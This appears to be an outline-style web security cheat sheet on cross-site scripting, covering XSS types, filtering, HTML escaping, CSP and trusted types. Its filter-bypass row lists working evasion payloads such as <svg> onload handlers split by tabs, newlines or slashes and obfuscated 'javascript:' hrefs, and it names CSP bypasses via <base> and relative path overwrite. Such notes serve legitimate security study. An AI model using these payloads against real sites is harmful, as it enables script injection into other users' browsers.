XSS¶
- Type
- Self-XSS
- Reflected XSS
- Stored XSS
-
Mitigation
-
Filter
Pattern Bypass [SPACE]on...= <svg<TAB>onload=alert(1)>[SPACE]on...= <svg\nonload=alert(2)>[SPACE]on...= <svg/ onload=alert(3)>javascript: <a href="\x01javascript:alert(4)">X</a>javascript: <a href="java\tscript:alert(5)">X</a>javascript: <a href="java	script:alert(6)">X</a><script JSFuck -
Escape (HTML Entity)
Symbol Alternative <<>>"" -
Content Security Policy (CSP) > CSP Evaluator
- script-src
- Nonce
-
trusted-types (Chrome)
- HTTP response header
- Define trusted resources
- HttpOnly
-
-
Bypass
<base>- Change base URL of all relative URL
- Relative Path Overwrite (RPO)
-
Case Study